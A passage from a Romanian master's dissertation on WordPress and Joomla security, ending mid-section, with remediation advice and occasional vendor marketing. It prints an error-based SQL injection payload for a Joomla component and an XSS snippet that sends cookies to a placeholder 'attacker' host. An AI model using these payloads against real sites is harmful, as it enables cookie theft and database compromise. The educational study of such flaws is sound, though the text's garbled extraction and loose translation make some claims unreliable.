Programul de studii: TEORIA COD ARII S I STOC ARII INFORMAT IEI [609846]
UNIVERSITATEA POLITEHNIC A DIN BUCURES TI
FACULTATEA DE S TIINTE APLICATE
Programul de studii: TEORIA COD ARII S I STOC ARII INFORMAT IEI
Aprobat Decan,
Prof. Univ. Dr. Emil PETRESCU
LUCRARE DE DISERTAT IE
Vulnerabilit at i ale Platformelor Web
Coordonator proiect:
Prof. Lect. Andrei-George OPRINA
Masterand: [anonimizat] TI
2019
Cuprins
List a de guri 3
1 Introducere 4
1.1 Ce este o platforma Web? . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.2 Arhitectura platformelor web . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3 Caracteristicile platformelor web . . . . . . . . . . . . . . . . . . . . . . . . 5
1.4 Interfat a bazei de date . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2 Vulnerabilit at ile platformei WordPress 6
2.1 Introducere – WordPress . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.2 Principalele vulnerabilit at i ale platformei WordPress . . . . . . . . . . . . 7
2.2.1 Duplicare Content . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.2 Plugin-uri si teme vulnerabile . . . . . . . . . . . . . . . . . . . . . 7
2.2.3 Nevoia de update-uri constante . . . . . . . . . . . . . . . . . . . . 7
2.2.4 Customizarea necesit a cuno stint e de programare . . . . . . . . . . . 7
3 Vulnerbilit at ile Platformei Joomla 8
3.1 Joomla SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.2 Joomla XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.3 Javascript Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.4 Phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.5 Pharma Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.6 Server congurat gres ,it . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.7 Cur at area Joomla Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.7.1 Cur at area bazei de date . . . . . . . . . . . . . . . . . . . . . . . . 11
3.7.2 Fixarea Joomla Hack: securizarea serverului . . . . . . . . . . . . . 11
3.7.3 Fixarea Joomla Hack: Setarea permisiunilor . . . . . . . . . . . . . 12
3.7.4 Fixarea Joomla Hack: Vericat ,i s ,ierele modicate . . . . . . . . . 12
3.7.5 Fixarea Joomla Hack: Vericat ,i jurnalele utilizatorilor . . . . . . . 13
3.7.6 Fixarea Joomla Hack: Actualizare . . . . . . . . . . . . . . . . . . . 13
4 Bitcoin Mining 13
4.1 Introducere . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.2 Creat ie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.3 Blockchain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
4.4 Mineritul Bitcoin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5 Aplicat ie 16
5.1 Vulnerabilitate Joomla! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.1 Joomla Hack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.2 Context . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.3 Analiz a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5.1.4 Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5.1.5 Solutie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
5.2 Vulnerabilitate WordPress WooCommerce XSS { Hack asupra unui cont
de client cu o imagine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
5.3 Vulnerabilitatea Drupal (CVE-2018-7602) a fost exploatat a pentru a fur-
niza malware de tip "Monero-Mining" . . . . . . . . . . . . . . . . . . . . . 36
List a de guri
1 Fix pentru update-ul CVE-2017-7985 . . . . . . . . . . . . . . . . . . . . . 17
2 Fix pentru CVE-2017-7986 . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
3 Introducerea noului PoC pentru CVE-2017-7985 . . . . . . . . . . . . . . . 18
4 Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n prima pagin a . . . . . 19
5 Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n pagina de administrator 19
6 Atacul codurilor HTML folosind \%0d%0a" . . . . . . . . . . . . . . . . . 20
7 Inserare PoC ^ n tag-ul SVG . . . . . . . . . . . . . . . . . . . . . . . . . . 20
8 SVG tag XSS ^ n prima pagin a . . . . . . . . . . . . . . . . . . . . . . . . . 21
9 SVG tag XSS ^ n pagina de administrator . . . . . . . . . . . . . . . . . . . 21
10 Ad augarea codului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
11 Administratorul site-ului declan seaz a atacul XSS ^ n pagina de administrator 27
12 Un nou SuperUser ad augat de atacator . . . . . . . . . . . . . . . . . . . . 27
13 ^Incarcarea unui shell web folosind Super contul de utilizator al atacatorului 28
14 Atacatorul este capabil de a accesa shell-ul web si execut a comenzi . . . . . 28
15 Patch CVE-2019-9168 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
16 Upload imagine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
17 Injectare cod XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
18 Imaginea compromisa uploadat a in pagina de Produse . . . . . . . . . . . 32
19 Zoom pe imaginea produsului . . . . . . . . . . . . . . . . . . . . . . . . . 33
20 Declan sarea atacului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
21 Crearea s ,ierului PoC la nivel local . . . . . . . . . . . . . . . . . . . . . . 34
22 Managerul de site utilizeaz a s ,ierul PoC ca imagine a produsului . . . . . . 35
23 Declan sarea atacului XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
24 Fragment de cod care arat a modul ^ n care CVE-2018-7602 este exploatat a 37
25 Fragment de cod care arat a modul ^ n care este recuperat scriptul shell . . . 37
26 O intrare crontab ad augat a de malware pentru a se actualiza automat . . . 37
27 Codurile de asamblare ale funct ,iei SEND DATA a downloader-ului . . . . . 38
28 O parte din XMRig inclus a ^ n malware-ul de tip minerit de criptograe . . 39
29 Pseudo-codurile inversate ale funct ,iei principale () a lui Monero-miner . . . 40
30 TOR informat ,ii nod de ies ,ire (2018/06/16) pentru 197 [.] 231 [.] 221 [.] 211 41
1 Introducere
1.1 Ce este o platforma Web?
O platform a web este o aplicat ie folosit a de utilizatori printr-o ret ea, cum ar In-
ternetul. Web aplicat iile interact ioneaz a de obicei, cu o baz a de date, permit ^ and unui
utilizator al aplicat iei s a act ioneze (indirect) cu acea baz a de date. Ele sunt scrise ^ ntr-un
limbaj de programare ales de dezvoltator. Adesea aplicat iile sunt scrise ^ n limbi dinamice
de scripting. Exemple de limbi de programare utilizate adesea pentru aplicat iile web sunt
PHP, ASP.NET, Java, Ruby, Python s ,i Perl. Cu toate acestea, aplicat ii web de obicei,
nu sunt scrise direct ^ ntr-un astfel de limbaj de programare, ci mai degrab a ^ ntr-un cadru
web. Din punctul de vedere al dezvoltatorului, multe aplicat ii web desf a soar a activit at i
similare si nu are sens s a pun a ^ n aplicare acelea si funct ,ionalit at i de ecare dat a. Platfor-
mele web furnizeaz a bibliotecile s a implementeze multe astfel de sarcini, facilit and astfel
dezvoltarea aplicat iilor web.
Init ial, un cadru web ar putea v azut ca o colect ie de biblioteci destinate s a ajute dezvol-
tatorii web. Aceste biblioteci sunt scrise ^ n acela si limbaj de programare ca si aplicat ia.
Dezvoltatorul poate include toate funct ionalit at ile din cadrul de care are nevoie. Cu toate
acestea, ast azi a sa-numitul "stack complet", cadrele sunt mai frecvente. Aceste cadre nu
sunt doar o colect ie de biblioteci, ci pot v azute ca o extensie a limbajului de programare.
Desigur, cadrele ofer a ^ n continuare multe funct ,ionalit at i comune gata de utilizare, dar
fac si mai multe. Ele formeaz a un pachet de software coerent ^ n care dezvoltatorii ^ si
construiesc aplicat iile. Dezvoltatorii sunt destul de limitat i ^ n libertatea lor. Ei trebuie
sa urmeze regulile, adic a modelele si principiile de proiectare ale cadrului. Nu trebuie
doar s a scrie aplicat ia web ^ n limba de programare pe care au ales-o, ci s a si includ a unele
funct ionalit at i necesare, dar sunt mai mult sau mai put in fort ate s a lucreze complet ^ n
acest cadru. Aceast a restrict ie ^ n libertate vine cu urm atorul beneciu:
Platformele web pot oferi funct ii web gata de utilizare, iar aplicat iile pot mai u sor de
scris ^ ntr-un mod frumos si consecvent ind posibil s a despart a modul de lucru al cadrelor,
de si acest lucru necesit a o munc a suplimentar a. Din fericire, acest lucru nu este adesea
necesar.
1.2 Arhitectura platformelor web
Prima proprietate important a a unui platforme web este tipul de arhitectur a pe care ^ l
utilizeaz a. Acest lucru este^ mp art it^ n dou a p art i, prima ind nivelul pe care funct ioneaz a
cadrul, al doilea ind modelul architectural urmeazat. Explic am diferent ele si pe ce fel
de cadre se concentreaz a aceast a cercetare. Structurile web urm aresc de obicei, un fel
de model arhitectural (sau, cel put in, ar trebui) si ele promoveaza sau chiar impune uti-
lizarea acestui model ^ n aplicat iile web, de asemenea. Modelul determin a de exemplu
modul ^ n care este structurat codul, ce se pune unde si ce componente pot apela / uti-
liza ecare altele (direct). Cel mai utilizat model arhitectural pentru platformele web
este Model-View-Controller (MVC). Este, de exemplu, folosit si de Ruby on Rails. Alte
modele arhitecturale folosite de web cadrele sunt, de exemplu, arhitectura orientat a pe
pagin a, arhitectura condus a de evenimente sau modelul condus de model arhitectur a. De
asemenea, este posibil ca un cadru s a nu urmeze deloc un model arhitectural clar (sau ^ l
folose ste doar pentru anumite p art i), de si aceste cadre nu sunt, de obicei, bine structurate
si duc la codul u sor de citit si ^ ntret inut.
4
1.3 Caracteristicile platformelor web
A doua proprietate ^ n care platformelor web ar putea diferi este caracteristicile pe
care le ofer a dezvoltatorului web. Nu toate cadrele web ofer a aceleas ,i caracteristici.
De exemplu, ^ n timp ce majoritatea cadrelor ofer a un fel de interfat ,a de baze de date,
funct ,ionalit at ,ile cache sunt mult mai put ,in frecvente. Vom prezenta acum cele mai co-
mune caracteristicile cadrelor web:
A doua proprietate ^ n care platformelor web ar putea diferi este caracteristicile pe care le
ofer a dezvoltatorului web. Nu toate cadrele web ofer a aceleas ,i caracteristici. De exemplu,
^ n timp ce majoritatea cadrelor ofer a un fel de interfat ,a de baze de date, funct ,ionalit at ,ile
cache sunt mult mai put ,in frecvente. Vom prezenta acum cele mai comune caracteristicile
cadrelor web:
Interfat ,a bazei de date:
Multe cadre ofer a o interfat , a pentru a efectua operat ,iuni de baz a de date. Cu toate aces-
tea, ceea ce ofer a exact s ,i modul ^ n care aceast a interfat , a este implementat a poate diferi
semnicativ. De cand interfat ,a bazei de date este de interes deosebit pentru cercetarea
noastr a (din cauza posibilelor inject ,ii SQL)
Caching:
Cache-ul poate ajuta la reducerea utiliz arii l at ,imii de band a, a ^ nc arc arii serverului s ,i a
timpilor de r aspuns. De cand aplicat ,iile web trebuie s a e c^ at mai rapide posibil s ,i s a
nu utilizeze prea multe resurse server, multe cadrele web includ mecanisme de caching.
Caching poate implementat la diferite niveluri de procesul de executare. Ce mecanisme
sunt furnizate s ,i la ce nivel acestea sunt implementate depinde de cadru.
Routing:
Dup a cum am discutat mai devreme, cadrele MVC1ofer a o separare frumoas a a modelului
de date reprezentarea datelor s ,i logica aplicat ,iilor. Cu toate acestea, aplicat ,iile web sunt,
^ n principiu, pagini web r aspunz^ and la cererile HTTP. Deci, avem nevoie de o modalitate
de a permite o anumit a cerere HTTP, pentru a anumit a adres a URL, declans ,eaz a o
anumit a pies a a logicii aplicat ,iei. Cu alte cuvinte, pentru a declans ,a un anumit bucat a de
cod ^ n unele controler. Aceasta a fost de rutare (numit, de asemenea, maparea URL-ul)
intr a ^ n vigoare. Mecanismul de rutare hart a cereri de adrese URL / HTTP c atre anumite
p art ,i ale controlerului s ,i, eventual, s ,i viceversa.
Servicii web:
Site-uri web originale unde se intent ,ioneaz a crearea de aplicat ,ii web care servesc web pa-
gini pentru utilizatorii umani. Cu toate acestea, pe m asur a ce web-ul devine mai integrat,
aplicat ,iile web au adesea pentru a comunica cu alte sisteme externe, de asemenea. Acesta
este scopul serviciilor web. A serviciul web este o pies a a aplicat ,iei care poate folosit a de
alte sisteme pentru a efectua act ,iuni sau citit ,i datele. Multe cadre web ofer a instrumente
pentru crearea serviciilor web. De exemplu, Ruby este pornit Rails, ofer a un mecanism
pentru a face orice pagin a web disponibil a s ,i ca serviciu web, utiliz^ and JSON sau XML.
Testarea:
Multe cadre ofer a mai multe instrumente pentru a us ,ura cu testarea (automat a). Cadrele
pot include instrumente pentru a specica s ,i verica (automat) testele unit at ,ii, testele
funct ,ionale s ,i integrarea teste. Unele cadre, inclusiv Ruby on Rails, chiar promoveaz a
utilizarea acestor instrumente ^ n mod explicit s ,i s a ^ ncurajeze dezvoltarea testat a TDD2.
Securitatea:
O caracteristic a deosebit de interesant a pentru cercetarea noastr a este sigurant ,a. Ca-
1Model View Controller
2Test Drive Development
5
drele ofer a adesea mai multe instrumente pentru a preveni atacurile comune, cum ar
inject ,iile SQL, Cross-Site Scrierea s ,i falsicarea cererilor pentru site-uri. De asemenea, ar
putea oferi implement ari pentru o anumit a securitate funct ,ionalit at ,i, cum ar solut ,iile
de autenticare s ,i de autorizare.
1.4 Interfat a bazei de date
Aproape toate frameworks ofer a o interfat a de baz a de date pentru a efectua operat iuni
de baz a de date. Cu toate acestea, ceea ce ofer a exact pot diferi semnicativ. Unele
cadre ofer a doar comunicarea interfat , a, ^ n cazul ^ n care trebuie s a mai scriet ,i singur in-
terog arile. Alte cadre ofer a, de asemenea, constructori de interog ari care v a permit s a
creat ,i cu us ,urint , a interog ari pentru operat ,iuni comune. Aces ,ti constructori de interog ari
ar putea aplica automat s ,i dezinfectarea datelor de intrare ^ n mod automat. Unele cadre
^ ncearc a s a reduc a munca pentru dezvoltatori.
c^ at mai mult posibil s ,i s a furnizeze multe funct ,ii de ajutor s ,i chiar s a efectueze automat
sarcini comune de baze de date ^ n mod automat. Cel mai interesant pentru aceast a cer-
cetare sunt totus ,i funct ,iile de securitate (de ex. Sanitizarea) pe care le furnizeaz a. Aceste
funct ,ionalit at ,i ar trebui incluse ^ n criteriul de referint , a, astfel ^ nc^ at acestea s a poat a
analizate. Aceasta ar trebui vericat faptul c a aceste funct ,ionalit at ,i ^ mpiedic a inject ,iile
SQL. De asemenea, modul ^ n care este implementat a funct ,ionalitatea, inclusiv tipul de
ORM utilizat de cadru, este important pentru noi. Aceasta determin a modul ^ n care
testele ar trebui s a e puse ^ n aplicare ^ n criteriul de referint , a. De exemplu, ^ ntr-un cadru
care nu este automat aplicat ,i dezinfectarea datelor de intrare ale utilizatorilor, ar trebui
s a ne asigur am c a ajutoarele pentru dezintoxicare sunt ^ ntr-adev ar ind incluse ^ n criteriul
de referint , a.
2 Vulnerabilit at ile platformei WordPress
Internetul este mai dinamic ^ n prezent dec^ at a fost vreodat a p^ an a acum. Accesul la
informat ,ie se realizeaz a printr-un simplu click, iar num arul de bloguri, site-uri de prezen-
tare s ,i magazine online cres ,te ^ n ecare zi. Este mai us ,or ca oric^ and s a-t ,i creezi un site,
e c a vrei s a scrii articole sau s a vinzi produse sau servicii. O resurs a la care apeleaz a
majoritatea persoanelor pentru crearea unui site este WordPress. Fie c a foloses ,ti aceast a
platform a deja, sau doar ai auzit de ea dar nu s ,tii exact ^ n ce const a, articolul nostru t ,i
se adreseaz a. ^It,i vom prezenta pe scurt ce este WordPress s ,i care sunt avantajele, dar s ,i
riscurile la care te supui dac a ^ t ,i creezi un site pe aceast a platform a.
2.1 Introducere – WordPress
WordPress { una dintre cele mai populare platforme CMS
WordPress este o platform a CMS. Dac a nu ai auzit de acest termen p^ an a acum, CMS
este un acronim pentru Content Management System. WordPress este ^ n zilele noastre
prima solut ie de realizare a unui website sau blog la care apeleaz a majoritatea persoanelor.
Motivele variaz a { de la
exibilitatea platformei, la diversitatea plugin-urilor, la faptul c a
interfat ,a este accesibil a, la existent ,a unei variante gratuit a pentru ^ ncep atori, la variat ,ia
temelor disponibile sau posibilit at ,ilor de customizare. ^Ins a, nu foarte multe persoane
cunosc si vulnerabilit at ile platformei WordPress. ^In continuare noi vom analiza c ateva
6
dintre acestea pentru ca utilizatorii s a e informat i ^ nainte de a lua decizia de a crea un
site.
2.2 Principalele vulnerabilit at i ale platformei WordPress
2.2.1 Duplicare Content
Creatorii de cont inut pe WordPress sunt cei mai familiarizat i cu aceast a problem a.
Atunci c^ and postezi un articol nou, el apare pe WordPress ^ n mai multe locat ,ii { pe
prima pagin a, pe pagin a din categorie, pe pagina din arhiva lunar a, dac a dai click pe un
anumit tag etc. ^In funct ,ie de tem a, un singur articol poate as ,at ^ n mai multe locat ,ii
pe site. Google poate s a penalizeze astfel de site-uri sau s a le considere spam din cauza
cont ,inutului duplicat. Astfel, site-ul t au ar putea avea de suferit ^ n ranking-urile Google
pe cuvinte cheie.
2.2.2 Plugin-uri si teme vulnerabile
Des ,i WordPress ofer a utilizatorilor s ai o gam a larg a de plugin-uri, de la cele de secu-
ritate, la cele de SEO3, o mare parte dintre plugin-uri nu sunt vericate temeinic, pot
expuse atacurilor sau nu sunt testate ^ nainte de a instalate pe un site. Exist a zeci de
mii de plugin-uri pe WordPress, iar o ofert a generoas a nu garanteaz a neap arat o calitate
mai mare.
At^ at plugin-urile, c^ at s ,i temele sunt create de oameni s ,i companii diferite, iar aces ,tia nu
pot monitorizat ,i, astfel c a pot ap area linii de cod virusate sau erori de programare.
Dac a nu te pricepi s ,i decizi s a instalezi plugin-uri nevericate, site-ul t au poate mult
mai vulnerabil la atacuri cibernetice. ^It,i recomand am s a apelezi mereu la o echip a de
specialis ,ti care s a te ajute cu congurarea s ,i mentenant ,a site-ului t au.
Aici, la ExpertOnline, noi ^ t ,i oferim site-uri securizate s ,i t ,inem cont de exigent ,ele tale
^ n materie de design. Toate plugin-urile pe care le instal am sunt studiate ^ ndeaproape
^ nainte de instalare, pentru a ne asigura c a site-ul t au funct ,ioneaz a la parametri optimi
s,i este sigur ^ n ecare zi.
2.2.3 Nevoia de update-uri constante
Nu este de ajuns doar s a instalezi platforma WordPress, ai nevoie minim de o tem a
s,i de c^ ateva plugin-uri pentru ca site-ul t au s a funct ,ioneze corespunz ator. De asemenea,
WordPress-ul are nevoie de update-uri constante, ceea ce poate s a afecteze modul ^ n care
se vede tema ta sau s a determine plugin-urile deja instalate s a nu mai funct ,ioneze. Cu
c^ at foloses ,ti mai multe plugin-uri, cu c^ at este mai probabil s a te confrunt ,i cu astfel de
probleme de compatibilitate.
2.2.4 Customizarea necesit a cuno stint e de programare
Dac a vrei s a te bucuri de un site pe WordPress cu anumite funct ,ionalit at ,i ^ n plus
sau un design original, trebuie s a ai cunos ,tint ,e de programare, s a s ,tii c^ ate ceva despre
HTML, CSS sau PHP. Dac a ai cunos ,tint ,e insuciente, pot ,i face mai mult r au dec^ at bine
site-ului t au. Acelas ,i lucru se poate ^ nt^ ampla s ,i dac a apelezi la o echip a de programatori
3Search Engine Optimization
7
insucient preg atit a.
Chiar dac a WordPress are o serie de vulnerabilit at ,i, dac a alegi serviciile unor oameni
competent ,i, pot ,i avea parte de site-ul pe care t ,i-l dores ,ti, s a te bucuri de securitatea
datelor tale s ,i s a te remarci prin cont ,inutul propriu.
3 Vulnerbilit at ile Platformei Joomla
3.1 Joomla SQL Injection
Inject ,ia SQL este una din problemele semnicative de securitate Joomla. Joomla are
o istorie lung a de vulnerabilit at ,i SQL. O inject ,ie SQL este rezultatul intr arii nesanitizate.
Avet ,i ^ ncredere ^ n utilizatorul cu intrare s ,i tot felul de lucruri pot merge prost. Joomla
SQL injectarea dateaz a din 2008 p^ an a ^ n 2008. ^Incep^ and de atunci, datorit a componentei
Ice Gallery , componenta 0 ;5 beta 2 pentru Joomla. S ,i ^ n acest an au fost g asite mai
multe puncte de injectare SQL Joomla. Ultimele inject ,ii SQL Joomla ^ n acest an includ
CVE-2018 8045. Mai multe componente vulnerabile au fost descoperite anul acesta. Cu
toate acestea, pentru a simplica lucrurile ne vom concentra pe cea mai recent a. Com-
ponenta "jimtawl" a lui Joomla este vulnerabil a la injectarea SQL. Vulnerabilitatea se
g ases ,te ^ n parametrul "id". O declarat ,ie post simpl a ar ar ata astfel:
http://localhost/[PATH]/index.php?option=
com_jimtawl&view=user&task=user.edit&id=[SQL]
Cu toate acestea, problema este dac a un utilizator ofer a o intrare nesanitizat a dup a
parametrul "id". Lucrurile pot escalate de aici ^ ncolo. Acesta poate exploatat folosind
o instruct ,iune "pe baz a de erori".
' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1)))
,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))|VerAyari'
Deci, acest cod dat mai sus poate folosit pentru a o exploata. Acest cod imprim a
versiunea de informat ,ii despre utilizator s ,i baza de date a serverului. Codul poate modi-
cat pentru a executa toate tipurile de operat ,iuni de baz a de date. Recent, detalii despre
acest lucru au fost lansate pe exploit-db. Aceasta ^ nseamn a c a este vizibil public pentru
tot ,i. Deci chiar s ,i un noob poate provoca o hacking Joomla. Mai ales folosind instrumente
cum ar sqlmap. Sqlmap va automatiza ^ ntregul proces. Deci, aceast a component a este
una dintre problemele de securitate Joomla de pe site-ul propriu
3.2 Joomla XSS
Cross Site Scripting atacurile sunt frecvente pe site-urile Joomla. Probleme multi-
ple de securitate XSS Joomla au fost g asite ^ n acest an. Un Joomla XSS este destul de
similar cu o inject ,ie SQL Joomla. Cu toate acestea, diferent ,a este c a este exploatat a
folosind Javascript. Joomla este cons ,tient a de acest fapt s ,i, prin urmare, are anumite
veric ari s ,i balant ,e. Aceste ltre XSS elimin a intrarea d aun atoare. Cu toate acestea,
CVE-2018-11326 a fost vorba despre ocolirea acestor ltre. A fost sever a pentru c a era
XSS persistent a. Cea mai recent a din aceast a list a lung a este CVE-2018-12711. Modulul
"modul de comutare a limbii" este responsabil de data aceasta. Adresa URL a unor limbi
poate injectat a cu javascript.
8
<script>window.location=
'http://attacker/cookie='+document.cookie</script>
De exemplu, aceast a bucat a de cod fur a cookie-ul utilizatorului. Deci, acesta este un XSS
re
ectat. Asta ^ nseamn a c a atacatorul poate crea o cerere special a. Trimiterea acestei
solicit ari poate utilizat a pentru furtul sau furtul de cookie-uri. Instrumente suplimentare
cum ar Xsser pot ajuta la detectarea s ,i exploatarea automat a a site-urilor web.
3.3 Javascript Injection
C^ and vine vorba de Joomla, Javascript ajut a la ^ ndeplinirea unor sarcini puternice s ,i
dinamice. Uneori, datorit a codic arii defectuoase, exist a o posibilitate pentru o inject ,ie
de Javascript ^ n Joomla. O inject ,ie Javascript v a ajut a ^ n mod substant ,ial s a manipulat ,i
site-ul web. Mai mult, un atacator ^ l poate folosi pentru a fura cookie-urile s ,i pentru a
schimba modul ^ n care arat a site-ul dvs. Este posibil a o simpl a testare manual a pentru
inject ,ia Javascript. ^In bara de adrese a tipului de site:
javascript:alert(`Executed!');
Dac a vedet ,i o caset a de mesaj "Execut a", atunci site-ul este vulnerabil. O inject ,ie cu
Javascript poate avea consecint ,e mortale pentru site, precum:
Introduce formulare false pe site.
Fur a cookie-urile utilizatorilor.
Modic a aspectul complet al site-ului.
Folosit pentru redirect ,ion ari false;
Folosit pentru injectarea de spam.
O inject ie cu Javascript este doar o lips a de validare a intr arilor. C^ and vine vorba de
Joomla, nu se bazeaz a pe executarea de c atre client a codului. Cu toate acestea, alt ,i
parametri precum c^ ampurile de intrare ar putea vulnerabili la inject ,ia Javascript. Deci,
cea mai bun a practic a ar utilizarea modulelor automate de testare.
3.4 Phishing
Atacurile de tip phishing sunt deseori folosite pentru a comite o hacking Joomla. Un
atac de phishing face ca un utilizator legitim s a cread a ^ n pagini false. Utilizatorul ne-
potrivit trimite apoi informat ,ii sensibile la pagin a. Aceste informat ,ii sunt apoi citite de
atacator pentru a avea acces la sistem. Sunt utilizate mai multe metode de phishing cum
ar :
Pagini de autenticare false.
Adrese de e-mail pentru phishing.
Apeluri telefonice prin phishing.
9
Pagini de actualizare false.
Utilizarea problemelor de securitate de la Joomla, cum ar XSS, pentru phishing;
Un nou tip de atac de phishing este ^ n cres ,tere ^ n zilele noastre. ^In primul r^ and, arat a
o pagin a de conectare ^ n containerul minimizat. Aceasta arata ca orice alta pagina legi-
tim a. Cu toate acestea, trucul const a ^ n minimizarea paginii. Utilizatorul poate vedea
doar primele cuvinte ale URL-ului. Deci el / ea poate presupune c a pagina este legitim a.
Cu toate acestea, atunci c^ and adresa URL complet a este expus a, scenariul este diferit. A
fost o pagin a fals a creat a de MaliciousSITE.com. Nu este mare lucru pentru ca acesta s a
obt ,in a un certicat HTTPS. ^In plus, anumite trucuri avansate, cum ar codarea URL-
urilor, sunt utile pentru atacatori. Acest lucru face pagina s a arate exact ca o pagina real a.
3.5 Pharma Hack
Site-urile Joomla sunt t ,inte bune pentru spam-ul SEO. Majoritatea datorit a popu-
larit at ,ii lor. Spamatorii folosesc aceste site-uri web pentru a-s ,i r asp^ andi anunt ,urile. ^In
cea mai mare parte arat a produse farmaceutice, ^ n special pastile. Cea mai mare parte a
site-urilor SEO spam infectate pot c autate pe Google. Un simplu Google Dork ca inurl:
"viagra" "alimentat de Joomla" poate face trucul. ^Intrebarea de c autare arat a apoi ceva
de genul acesta.
Dup a cum putem vedea toate aceste site-uri Joomla sunt infectate cu SEO Spam. Meta
descrierea lor arata "viagra" anunturi. Mai multe vulnerabilit at ,i Joomla pot folosite
pentru a injecta acest spam. Probabil ar putea o inject ,ie de cod sau orice alt a hacking
Joomla. Cu toate acestea, rezultatele sunt devastatoare pentru site. Site-ul ^ s ,i pierde
reputat ,ia s ,i ^ ncrederea utilizatorilor. Poate greu s a te recuperes ,ti din clasamentul de
c autare dup a un Pharma Hack.
3.6 Server congurat gres ,it
Uneori, ^ n caz de hacking Joomla, serverul defect ar putea responsabil. Adesea, lipsa
unei permisiuni adecvate pe server poate provoca un dezastru. ^In instal arile Joomla, ^ n
mod implicit, s ,ierul .htacess are permisiunile de scriere. Deci, acest lucru ar putea cauza
atacatorului s a obt ,in a informat ,ii sensibile. Mai multe lucruri pot merge prost cu serverele
cum ar :
Sub-domenii uitate.
Instal ari ^ nvechite.
Server DNS neprotejat.
Porturi nesecurizate;
Site-uri multiple care partajeaz a acelas ,i spat ,iu f ar a subret ,ea. Deci, dac a cineva este
infectat, se r asp^ andes ,te.
Deci, instalarea serverului trebuie vericat a din c^ and ^ n c^ and. Permisiunile s ,i erorile de
s,iere slabe expun informat ,ii sensibile. Prin urmare, securitatea serverului este vital a
pentru a evita hacking-ul Joomla.
Avet ,i nevoie de ajutor profesional ^ n asigurarea serverului de la un Joomla Hack? Dat ,i-ne
10
un mesaj pe widget-ul de chat s ,i ne-am bucura s a v a ajut am. Fixat ,i rezultatele mele de
pe site acum.
3.7 Cur at area Joomla Hack
3.7.1 Cur at area bazei de date
^In primul r^ and, ^ ncepet ,i cur at ,area din baza de date infectat a. Joomla SQL injection
poate crea noi utilizatori de baze de date. Pentru a avea grij a de noii utilizatori creat ,i
dup a o anumit a dat a, utilizat ,i urm atorul cod:
SELECT * FROM users LIKE U
AND U.create> UNIX_TIMESTAMP (STR_TO_DATE ('My_Date', '% M% d% Y'));
ce sunt g asit ,i utilizatorii necinstit ,i. Deci, s ,terget ,i-le folosind instruct ,iunea SQL Drop
User ; . Nu numai acest lucru, pentru a evita viitoarele infect ,ii:
Sanitizeaz a intrarea utilizatorului.
Restrict ,ionat ,i permisiunile bazei de date la cont.
Blocat ,i dezv aluirea erorii bazei de date doar la nivel local.
Folosit ,i turnarea de tip ori de c^ ate ori este posibil;
3.7.2 Fixarea Joomla Hack: securizarea serverului
Chiar s ,i atunci c^ and instalarea este securizat a, serverele de defect ,iuni pot cauza o
hacking Joomla. Des ,i exist a o mare list a de probleme de securitate Joomla. Anumite
puncte cheie de ret ,inut sunt:
^Ihidet ,i toate porturile deschise.
Scoatet ,i subdomenii neutilizate.
Vericat ,i regulat problemele de congurare.
Dac a partajat ,i un server merget ,i la subret ,ea. Sau utilizat ,i o ret ,ea VPN.
Blocheaz a mesajele de eroare care scurg din informat ,iile.
Dat ,i parole puternice s ,i aleatoare la conturile FTP s ,i la baza de date!
Asigurat ,i-v a c a utilizat ,i un rewall sau un fel de solut ,ie de securitate.
11
3.7.3 Fixarea Joomla Hack: Setarea permisiunilor
^In primul r^ and, asigurat ,i-v a c a niciun utilizator nu poate ^ nc arca s ,iere executabile,
cum ar .php .aspx, etc. Doar s ,ierele imagine vor ^ nc arcate pe server. Acum trecet ,i
pentru a seta permisiunile de s ,iere pentru server. Poate s ,ierul cel mai sensibil este
s,ierul .htaccess. Deci, pentru a seta permisiunile de s ,ier adecvate. Setat ,i permisiunea
.htaccess la 444 (r-r-r-) sau poate la 440 (r-r{).
De asemenea, asigurat ,i-v a c a s ,ierele dvs. PHP nu pot suprascrise. Prin urmare, tre-
buie s a setat ,i * .php la 444 (r-r-r-). Cel mai important este s a utilizat ,i extensiile de s ,iere
populare. Joomla este un CMS destul de mare, astfel ^ nc^ at supleant ,ii sunt ^ ntotdeauna
acolo. Extensiile populare ajung mai rapid ^ n cazul vulnerabilit at ,ii. Deci, ^ ncercat ,i s a le
evitat i.
3.7.4 Fixarea Joomla Hack: Vericat ,i s ,ierele modicate
De cele mai multe ori, hackerii v a modic a s ,ierele pentru a injecta mesaje spam.
